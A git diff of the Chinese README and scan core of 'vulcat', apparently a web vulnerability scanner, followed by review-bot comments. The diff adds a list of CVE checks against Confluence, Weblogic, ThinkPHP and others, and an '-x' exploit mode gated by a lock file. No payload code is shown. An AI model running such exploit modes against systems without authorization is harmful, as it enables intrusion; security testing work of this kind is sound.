路径遍历 | -| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 路径遍历 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache SkyWalking | CVE-2020-9483 | SQLinject | SkyWalking SQL注入 | 
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Solr | CVE-2017-12629 | RCE | Solr 远程命令执行 | -| Apache Solr | CVE-2019-17558 | RCE | Solr Velocity 注入远程命令执行 | -| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 | -| Apache Struts2 | S2-005 | RCE | Struts2远程代码执行 | -| Apache Struts2 | S2-007 | RCE | Struts2远程代码执行 | -| Apache Struts2 | S2-008 | RCE | Struts2远程代码执行 | -| Apache Struts2 | S2-009 | RCE | Struts2远程代码执行 | -| Apache Struts2 | S2-012 | RCE | Struts2远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT方法任意文件写入 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | AppWeb身份认证绕过 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence任意文件包含 | -| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence路径遍历和命令执行 | -| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence Webwork Pre-Auth OGNL表达式命令注入 | -| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | 思科ASA/FTD XSS跨站脚本攻击 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Discuz | wooyun-2010-080723 | RCE | 全局变量防御绕过RCE | 
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | debug page XSS跨站脚本攻击 | -| Django | CVE-2018-14574 | Redirect | CommonMiddleware url重定向 | -| Django | CVE-2019-14234 | SQLinject | JSONfield SQL注入 | -| Django | CVE-2020-9402 | SQLinject | GIS SQL注入 | -| Django | CVE-2021-35042 | SQLinject | QuerySet.order_by SQL注入 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQL 注入 | -| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML 反序列化代码执行 | -| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 远程代码执行 | -| Drupal | CVE-2018-7602 | RCE | Drupal 远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch命令执行 | -| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy 沙盒绕过&&代码执行 | -| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch 目录穿越 | -| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch 目录穿越 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP远程代码执行 | -| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 反序列化 | -| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 反序列化 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Gitea | None | unAuth | Gitea 1.4.0 未授权访问 | 
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth 远程命令执行 | -| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API未授权 SSRF | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Influxdb | None | unAuth | influxdb 未授权访问 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Jetty | CVE-2021-28164 | DSinfo | jetty 模糊路径信息泄露 | -| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet 双重解码信息泄露 | -| Jetty | CVE-2021-34429 | DSinfo | jetty 模糊路径信息泄露 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Jupyter | None | unAuth | Jupyter 未授权访问 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd 任意文件读取 | 
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum插件 远程命令执行 | -| Nexus Repository | CVE-2019-7238 | RCE | 3.x 远程命令执行 | -| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475的绕过 | -| Nexus Repository | CVE-2020-10199 | RCE | 3.x 远程命令执行 | -| Nexus Repository | CVE-2020-10204 | RCE | 3.x 远程命令执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 | -| Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| NodeRED | CVE-2021-3223 | FileRead | Node-RED 任意文件读取 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| phpMyadmin | WooYun-2016-199433 | unSerialize | phpMyadmin Scripts/setup.php 反序列化 | -| phpMyadmin | CVE-2018-12613 | FileInclude | phpMyadmin 4.8.1 远程文件包含 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| PHPUnit | CVE-2017-9841 | RCE | PHPUnit 远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails 路径遍历 | -| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails 任意文件读取 | -| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails 命令执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| ShowDoc | CNVD-2020-26585 | 
FileUpload | ShowDoc 任意文件上传 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Spring | CVE-2016-4977 | RCE | Spring Security OAuth2 远程命令执行 | -| Spring | CVE-2017-8046 | RCE | Spring Data Rest 远程命令执行 | -| Spring | CVE-2018-1273 | RCE | Spring Data Commons 远程命令执行 | -| Spring | CVE-2020-5410 | FileRead | Spring Cloud目录遍历 | -| Spring | CVE-2021-21234 | FileRead | Spring Boot目录遍历 | -| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl远程代码执行 | -| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL远程代码执行 | -| Spring | CVE-2022-22965 | RCE | Spring Framework远程代码执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x 远程代码执行 | -| ThinkPHP | CNVD-2018-24942 | RCE | 未开启强制路由导致RCE | -| ThinkPHP | CNNVD-201901-445 | RCE | 核心类Request远程代码执行 | -| ThinkPHP | None | RCE | ThinkPHP2.x 远程代码执行 | -| ThinkPHP | None | SQLinject | ThinkPHP5 ids参数SQL注入 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Ueditor | None | SSRF | Ueditor编辑器SSRF | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic 服务端请求伪造 | -| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder反序列化 | -| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async反序列化 | -| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic 权限验证绕过 | -| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic 未授权命令执行 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth 远程代码执行 | -| Webmin | CVE-2019-15642 | RCE | Webmin 远程代码执行 | 
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Yonyou | CNNVD-201610-923 | SQLinject | 用友GRP-U8 Proxy SQL注入 | -| Yonyou | CNVD-2021-30167 | RCE | 用友NC BeanShell远程命令执行 | -| Yonyou | None | FileRead | 用友ERP-NC NCFindWeb目录遍历 | -| Yonyou | None | DSinfo | 用友U8 OA getSessionList.jsp 敏感信息泄漏 | -| Yonyou | None | SQLinject | 用友U8 OA test.jsp SQL注入 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -``` -
- -## 行为规范 -在使用本工具前, 请确保您的行为符合当地法律法规, 并且已经取得了相关授权。 +## 行为规范和免责声明 +* **在使用本工具前, 请确保您的行为符合当地法律法规, 并且已经取得了相关授权。** -本工具仅面向拥有合法授权的企业和个人等, 意在加强网络空间安全。 +* **本工具仅面向拥有合法授权的企业和个人等, 意在加强网络空间安全。** -如果您在使用本工具的过程中存在任何非法行为, 或造成了任何严重后果, 您需自行承担相应责任, 我们将不承担任何法律及连带责任。 +* **如果您在使用本工具的过程中存在任何非法行为, 或造成了任何严重后果, 您需自行承担相应责任, 我们将不承担任何法律及连带责任。** ## 安装 && 使用 @@ -184,6 +32,10 @@ pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple python3 vulcat.py -h ``` ``` +Usage: +使用本工具, 代表您同意"vulcat/README.zh-cn.md"中的"行为规范和免责声明"; 如果您不同意, 请勿使用本工具 + + Usage: python3 vulcat.py Examples: python3 vulcat.py -u https://www.example.com/ @@ -248,6 +100,8 @@ Options: 指定漏洞编号, 配合-a/--application对单个漏洞进行扫描, 可以使用--list查看漏洞编号, 没有漏洞编号的漏洞暂不支持, 编号不区分大小, 符号-和_皆可 (如: -a fastjson -v CNVD-2019-22238 或者 -a Tomcat -v cvE-2017_12615) + -x, --exp 配合-a和-v参数进行使用, Poc扫描过后, 如果该漏洞存在, 则进入该漏洞的Exp交互模式; 可以使用 + --list查看支持Exp的漏洞(如: -a httpd -v CVE-2021-42013 -x) Api: 第三方api @@ -282,7 +136,7 @@ Options: drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, - phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring, + phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou ``` @@ -309,18 +163,170 @@ args.ceye_token = '' ## 自定义 POC * 如何编写自己的漏洞POC, 并添加到vulcat中 -* 找到vulcat/payloads/demo.py, demo.py是vulcat中的POC模板(半成品), 需要用户填写剩余的代码 +* 找到vulcat/payloads/demo/demo.py, demo.py是vulcat中的POC模板(半成品), 需要用户填写剩余的代码 * **修改步骤:** 1. 先将demo.py复制一份并保存, 防止模板丢失, 然后修改文件名为POC的名字(如test.py), 文件名可以自定义 2. 然后根据demo.py中的提示, 填写自己的代码, 并在vulcat中引入POC +## 漏洞列表 +
+目前支持扫描的web漏洞有: [点击展开] + +``` ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Target | Vuln id | Vuln Type | Exp | Description | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | - | 阿里巴巴Druid未授权访问 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | - | 阿里巴巴Nacos未授权访问 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | - | Airflow身份验证绕过 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX默认密钥 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | Y | Flink目录遍历 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache Hadoop | None | unAuth | - | Hadoop YARN ResourceManager 未授权访问 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 路径遍历 | +| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 路径遍历 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| 
Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQL注入 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache Solr | CVE-2017-12629 | RCE | - | Solr 远程命令执行 | +| Apache Solr | CVE-2019-17558 | RCE | Y | Solr Velocity 注入远程命令执行 | +| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/任意文件读取 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | - | PUT方法任意文件写入 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb身份认证绕过 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence任意文件包含 | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Y | Confluence路径遍历和命令执行 | +| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence Webwork Pre-Auth OGNL表达式命令注入 | +| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence远程代码执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | - | 思科ASA/FTD XSS跨站脚本攻击 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Discuz | wooyun-2010-080723 | RCE | Y | 全局变量防御绕过RCE | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | - | debug page XSS跨站脚本攻击 | +| Django | CVE-2018-14574 | Redirect | - | CommonMiddleware url重定向 | +| Django | CVE-2019-14234 | SQLinject | - | JSONfield 
SQL注入 | +| Django | CVE-2020-9402 | SQLinject | - | GIS SQL注入 | +| Django | CVE-2021-35042 | SQLinject | - | QuerySet.order_by SQL注入 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQL 注入 | +| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML 反序列化代码执行 | +| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 远程代码执行 | +| Drupal | CVE-2018-7602 | RCE | - | Drupal 远程代码执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch命令执行 | +| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy 沙盒绕过&&代码执行 | +| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch 目录穿越 | +| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch 目录穿越 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP远程代码执行 | +| F5 BIG-IP | CVE-2022-1388 | unAuth | Y | BIG-IP远程代码执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | - | Fastjson <= 1.2.24 反序列化 | +| Fastjson | CNVD-2019-22238 | unSerialize | - | Fastjson <= 1.2.47 反序列化 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Gitea | None | unAuth | - | Gitea 1.4.0 未授权访问 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth 远程命令执行 | +| Gitlab | CVE-2021-22214 | SSRF | - | Gitlab CI Lint API未授权 SSRF | 
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x 插件模块路径遍历 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Influxdb | None | unAuth | - | influxdb 未授权访问 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Jenkins | CVE-2018-1000861 | RCE | - | jenkins 远程命令执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Jetty | CVE-2021-28164 | DSinfo | - | jetty 模糊路径信息泄露 | +| Jetty | CVE-2021-28169 | DSinfo | - | jetty Utility Servlets ConcatServlet 双重解码信息泄露 | +| Jetty | CVE-2021-34429 | DSinfo | - | jetty 模糊路径信息泄露 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Jupyter | None | unAuth | - | Jupyter 未授权访问 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | - | 使用request_uri调用未经验证的URL | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | 蓝凌OA 任意文件读取/SSRF | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd 任意文件读取 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| mongo-express | CVE-2019-10758 | RCE | - | 未授权远程代码执行 | 
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum插件 远程命令执行 | +| Nexus Repository | CVE-2019-7238 | RCE | - | 3.x 远程命令执行 | +| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475的绕过 | +| Nexus Repository | CVE-2020-10199 | RCE | - | 3.x 远程命令执行 | +| Nexus Repository | CVE-2020-10204 | RCE | - | 3.x 远程命令执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js目录穿越 | +| Nodejs | CVE-2021-21315 | RCE | - | Node.js命令执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED 任意文件读取 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php 反序列化 | +| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 远程文件包含 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit 远程代码执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails 路径遍历 | +| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails 任意文件读取 | +| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails 命令执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc 任意文件上传 | 
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 远程命令执行 | +| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest 远程命令执行 | +| Spring | CVE-2018-1273 | RCE | - | Spring Data Commons 远程命令执行 | +| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud目录遍历 | +| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot目录遍历 | +| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl远程代码执行 | +| Spring | CVE-2022-22963 | RCE | - | Spring Cloud Function SpEL远程代码执行 | +| Spring | CVE-2022-22965 | RCE | - | Spring Framework远程代码执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Supervisor | CVE-2017-11610 | RCE | - | Supervisor 远程命令执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x 远程代码执行 | +| ThinkPHP | CNVD-2018-24942 | RCE | Y | 未开启强制路由导致RCE | +| ThinkPHP | CNNVD-201901-445 | RCE | Y | 核心类Request远程代码执行 | +| ThinkPHP | None | RCE | - | ThinkPHP2.x 远程代码执行 | +| ThinkPHP | None | SQLinject | - | ThinkPHP5 ids参数SQL注入 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Ueditor | None | SSRF | - | Ueditor编辑器SSRF | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic 服务端请求伪造 | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder反序列化 | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async反序列化 | +| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic 权限验证绕过 | +| Oracle Weblogic | CVE-2020-14882 | RCE | - | Weblogic 
未授权命令执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth 远程代码执行 | +| Webmin | CVE-2019-15642 | RCE | Y | Webmin 远程代码执行 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +| Yonyou | CNNVD-201610-923 | SQLinject | - | 用友GRP-U8 Proxy SQL注入 | +| Yonyou | CNVD-2021-30167 | RCE | Y | 用友NC BeanShell远程命令执行 | +| Yonyou | None | FileRead | - | 用友ERP-NC NCFindWeb目录遍历 | +| Yonyou | None | DSinfo | - | 用友U8 OA getSessionList.jsp 敏感信息泄漏 | +| Yonyou | None | SQLinject | - | 用友U8 OA test.jsp SQL注入 | ++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ +vulcat-1.1.5/2022.11 +94/Poc +34/Exp +``` +
+ ## 感谢 -感谢以下开源项目提供的灵感以及部分源代码 * [vulmap](https://github.com/zhzyker/vulmap) * [sqlmap](https://github.com/sqlmapproject/sqlmap) * [dirsearch](https://github.com/maurosoria/dirsearch) +* [HackRequests](https://github.com/boy-hack/hack-requests) ## 参考链接 diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 4bd70a2..30e559d 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -10,6 +10,7 @@ from lib.plugins.fingerprint.waf import waf from lib.plugins.fingerprint.webapp import webapp +from lib.plugins.exploit import exploit from payloads.AlibabaDruid import alidruid from payloads.AlibabaNacos import nacos @@ -21,7 +22,7 @@ from payloads.ApacheSkyWalking import skywalking from payloads.ApacheSolr import solr from payloads.ApacheTomcat import tomcat -from payloads.ApacheStruts2 import struts2 +# from payloads.ApacheStruts2 import struts2 # 2022/11/04被移除 from payloads.AppWeb import appweb from payloads.AtlassianConfluence import confluence from payloads.Cisco import cisco @@ -39,7 +40,7 @@ from payloads.Jetty import jetty from payloads.Jupyter import jupyter from payloads.Keycloak import keycloak -# from payloads.Kindeditor import kindeditor +# from payloads.Kindeditor import kindeditor # 还未测试poc准确性 from payloads.Landray import landray from payloads.MiniHttpd import minihttpd from payloads.MongoExpress import mongoexpress @@ -51,6 +52,7 @@ from payloads.RubyOnRails import rails from payloads.ShowDoc import showdoc from payloads.Spring import spring +from payloads.Supervisor import supervisor from payloads.ThinkPHP import thinkphp from payloads.Ueditor import ueditor from payloads.Weblogic import weblogic @@ -74,6 +76,7 @@ def __init__(self): self.batch = config.get('batch') # * 是否启用默认选项 self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别 self.no_poc = config.get('no_poc') # * 是否启用WAF指纹识别 + self.exp = config.get('exp') self.thread_list = [] # * 已经运行的线程列表 self.results = [] # * 结果列表 
@@ -89,6 +92,10 @@ def start(self): logger.info('red_ex', self.lang['core']['start']['url_error'].format(u)) continue + if self.exp and (not self.vuln): + logger.info('yellow_ex', self.lang['core']['start']['exp']) # ? 提示, 使用exp之前 请先使用-a和-v参数指定一个漏洞 + break + logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url if check.check_connect(u): @@ -137,7 +144,7 @@ def start(self): continue if self.no_poc: - logger.info('red', self.lang['core']['start']['no_poc']) + logger.info('red', self.lang['core']['start']['no_poc']) # ? 提示, 不进行漏洞扫描 continue if check.check_connect(u): @@ -232,6 +239,15 @@ def stop(self): return False + def start_exp(self): + ''' 启动Exploit模式 ''' + try: + f = open('Exploit.lock') + f.close() + logger.info('red', self.lang['core']['start_exp']['lock']) # ? 日志, 使用exp时 请先删除vulcat/Exploit.lock锁文件 + except FileNotFoundError: + exploit.start(self.results) + def end(self): ''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存''' logger.info('cyan_ex', self.lang['core']['end']['wait']) # ? 日志, 等待所有线程运行完毕, 时间长短取决于timeout参数 @@ -242,11 +258,14 @@ def end(self): if self.txt_filename: # * 是否保存结果为.txt output.output_text(self.results, self.txt_filename, self.lang) - elif self.json_filename: # * 是否保存结果为.json + if self.json_filename: # * 是否保存结果为.json output.output_json(self.results, self.json_filename, self.lang) - # elif self.html_filename: + # if self.html_filename: # output.output_html(self.results, self.html_filename, self.lang) + if self.exp and self.vuln: # * 是否使用Exp + self.start_exp() + logger.info('yellow_ex', self.lang['core']['end']['completed']) # ? 日志, 扫描完全结束, 退出运行 logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色 print('\r'.ljust(70), end='\r') # * 解决wq的BUG diff --git a/lib/initial/config.py b/lib/initial/config.py index 358a914..24ccbbe 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py 
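Review bot: The guard `if self.exp and (not self.vuln):` added at the top of the URL loop in start() does not depend on `u`, yet it runs only after the first target has already been URL-validated and then `break`s out for every remaining target, so a mis-invoked `-x` run is rejected late and the remaining URLs are silently dropped. It belongs before the loop (or in lib/initial/config.py next to the `args.vuln` normalisation), e.g. `if self.exp and not self.vuln: logger.info('yellow_ex', self.lang['core']['start']['exp']); return` ahead of the `for` statement, so the precondition is checked once and the reason is logged exactly once. The enclosing start() body starts before and continues after this hunk, and the assignment of `self.vuln` is not visible here.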
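Review bot: In the new start_exp() the Exploit.lock file is the opt-in interlock for exploit mode, but it is probed with `f = open('Exploit.lock')` / `f.close()` and only `FileNotFoundError` is caught, so any other error (a `PermissionError`, or `IsADirectoryError` if someone creates a directory of that name) escapes as an unhandled traceback instead of a logged refusal, and the relative path is resolved against the current working directory, not the vulcat directory that the log message names. A plain existence test keeps the interlock fail-closed and avoids opening a file you never read: `if os.path.exists('Exploit.lock'):` logging `self.lang['core']['start_exp']['lock']`, `else:` calling `exploit.start(self.results)`; this needs `import os` in the module header, which is outside this hunk. If the lock is meant to live next to the tool rather than in the caller's cwd, anchor it with `os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..', 'Exploit.lock')` (lib/core/coreScan.py is two levels below the project root per the diffstat). A one-line docstring stating that the file's presence disables Exp mode would also help, since the condition is inverted from what a "lock" name suggests.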
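Review bot: In end() the new `if self.exp and self.vuln: self.start_exp()` enters the interactive exploit mode even when the scan found nothing, because `self.results` is not part of the condition; unless exploit.start() handles an empty list itself (not visible here), `if self.exp and self.vuln and self.results:` would skip the prompt when there is nothing to act on, which is also the safer default for a tool that may be run unattended with `--batch`. The switch from `elif` to `if` for the txt/json outputs is a good fix and deserves a comment such as `# * both formats may be written in the same run` so nobody reverts it to `elif` later. The enclosing end() continues past the end of the hunk.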
